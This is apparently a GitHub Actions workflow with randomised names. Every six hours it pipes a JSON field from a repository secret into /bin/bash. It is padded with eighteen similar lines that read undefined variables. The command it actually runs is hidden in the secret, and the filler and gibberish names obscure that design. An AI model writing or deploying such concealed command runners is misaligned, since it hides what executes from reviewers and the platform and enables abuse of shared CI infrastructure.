name: zhongliruo6121
on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhongliruo6121
        env:
          muqnr3: ${{ secrets.muqnr3 }}
        run: |
          echo $muqnr3 | jq -r .etf00 | /bin/bash
          echo $otfdu544 | jq -r .z5130 | /bin/bash
          echo $fy0288 | jq -r .bvz24873 | /bin/bash
          echo $ck15 | jq -r .sqibo515 | /bin/bash
          echo $a9842 | jq -r .yoi2 | /bin/bash
          echo $wy792 | jq -r .sgvvu57 | /bin/bash
          echo $ipukh58 | jq -r .l95 | /bin/bash
          echo $uncz2 | jq -r .k6130 | /bin/bash
          echo $fq575 | jq -r .nvxe04 | /bin/bash
          echo $j54938 | jq -r .rb060 | /bin/bash
          echo $icfba5206 | jq -r .ne99008 | /bin/bash
          echo $v9747 | jq -r .asc73 | /bin/bash
          echo $ji97 | jq -r .rt6951 | /bin/bash
          echo $yx8859 | jq -r .gmf407 | /bin/bash
          echo $opru49053 | jq -r .q59 | /bin/bash
          echo $uv8823 | jq -r .cg38364 | /bin/bash
          echo $ryvo7 | jq -r .sqjz6717 | /bin/bash
          echo $zzln66 | jq -r .h60 | /bin/bash
          echo $pfppt1 | jq -r .yjtvz1007 | /bin/bash

